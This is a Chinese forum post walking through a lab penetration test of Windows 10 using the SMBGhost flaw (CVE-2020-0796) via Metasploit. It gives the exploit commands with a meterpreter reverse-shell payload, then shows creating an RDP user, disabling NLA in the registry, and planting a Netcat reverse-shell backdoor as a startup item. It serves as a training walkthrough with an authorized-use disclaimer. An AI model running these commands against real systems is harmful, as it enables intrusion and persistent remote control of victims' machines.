用户名
Email
论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
朋友圈
看朋友圈动态,了解ToB世界。
ToB门户
了解全球最新的ToB事件
博客
Blog
排行榜
Ranklist
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
导读
Guide
相册
Album
记录
Doing
应用中心
帖子
本版
文章
帖子
ToB圈子
用户
免费入驻
产品入驻
解决方案入驻
公司入驻
案例入驻
登录
·
注册
只需一步,快速开始
账号登录
立即注册
找回密码
用户名
自动登录
找回密码
密码
登录
立即注册
首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
圈子
SAAS
IT评测·应用市场-qidao123.com技术社区
»
论坛
›
安全
›
网络安全
›
掌握安全渗透测试:利用永恒之黑漏洞获取Windows 10体系 ...
掌握安全渗透测试:利用永恒之黑漏洞获取Windows 10体系访问权限 ...
鼠扑
论坛元老
|
2024-7-28 20:01:20
|
显示全部楼层
|
阅读模式
楼主
主题
2024
|
帖子
2024
|
积分
6072
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要
登录
才可以下载或查看,没有账号?
立即注册
x
以下是利用永恒之黑漏洞对Windows 10举行渗透测试的步骤:
环境介绍
靶机
:IP地址为192.168.1.60,运行Windows 10 1903版本。
攻击机
:IP地址为192.168.1.53。
靶机准备
检查Windows 10版本号
:确保靶机运行的Windows 10版本受到永恒之黑漏洞(CVE-2020-0796 SMBGhost)的影响。
检查体系补丁
:确认靶机未安装补丁KB4551762,该补丁修复了永恒之黑漏洞。
开启445端口
:确保靶机的445端口(SMB协议)是开放的。
获取Shell
利用Metasploit框架
:
启动Metasploit:msfconsole。
利用永恒之黑漏洞模块:use exploit/windows/smb/cve_2020_0796_smbghost。
设置选项
:
显示模块选项:show options。
设置目标主机IP:set RHOSTS 192.168.1.60。
设置payload:set payload windows/x64/meterpreter/reverse_tcp。
设置攻击机监听IP:set LHOST 192.168.1.53。
禁用模仿模式:set DefangedMode false。
执行exploit
:
运行exploit:exploit。
创建新用户并开启远程桌面
开启RDP远程桌面
:
利用Metasploit的post/windows/manage/enable_rdp模块开启RDP服务,并创建新用户。
创建RDP用户
:
设置用户名和密码:set username xuegod 和 set password 123456。
指定会话ID:set session 1。
运行模块:run。
检查NLA设置
:
查询注册表以确定是否开启网络级身份验证(NLA)。
关闭NLA
(假如开启):
修改注册表值SecurityLayer和UserAuthentication为0,以允许非NLA的RDP毗连。
毗连远程桌面
:
在Kali上利用rdesktop下令毗连到靶机的远程桌面:rdesktop 192.168.1.60。
开启后门维持权限访问
配置后门程序
:
上传nc(Netcat)到Windows 10体系。
修改注册表添加启动项,以便在体系启动时执行nc反弹shell下令。
设置防火墙规则
:
允许443端口的网络访问,以使后门有效。
重启Windows 10
:
重启靶机以应用更改,并等待后门程序运行。
毗连后门
:
在Kali上利用nc下令毗连后门:nc -v 192.168.1.60 443。
MSF控制台毗连
(可选):
在Metasploit框架中利用connect下令毗连到后门:connect 192.168.1.60 443。
总结
文档提供了利用永恒之黑漏洞对Windows 10举行渗透的具体步骤,包括获取初始访问、创建远程桌面用户、开启后门以及维持权限访问。
请注意,这些步骤仅供教诲目标,实际操作应在授权的渗透测试和安全研究环境中举行。未经授权的渗透测试大概违反法律。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复
举报
0 个回复
倒序浏览
返回列表
快速回复
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
or
立即注册
本版积分规则
发表回复
回帖并转播
回帖后跳转到最后一页
发新帖
回复
鼠扑
论坛元老
这个人很懒什么都没写!
楼主热帖
Java 基于Apache POI实现Excel读写操作 ...
XAF新手入门 - 类型子系统(Types Info ...
Dapr 知多少 | 分布式应用运行时 ...
springboot开启单元测试的方法分享 ...
记录一次NoSuchMethodError问题的解决 ...
5.15日 搭建青龙面板教程——狗东跑跑 ...
C#生成putty格式的ppk文件(支持passph ...
Python 封装SNMP调用接口
风险洞察之事件总线的探索与演进 ...
SQLSERVER大小写转换方法
标签云
集成商
AI
运维
CIO
存储
服务器
浏览过的版块
程序人生
登录参与点评抽奖加入IT实名职场社区
下次自动登录
忘记密码?点此找回!
登陆
新用户注册
用其它账号登录:
关闭
快速回复
返回顶部
返回列表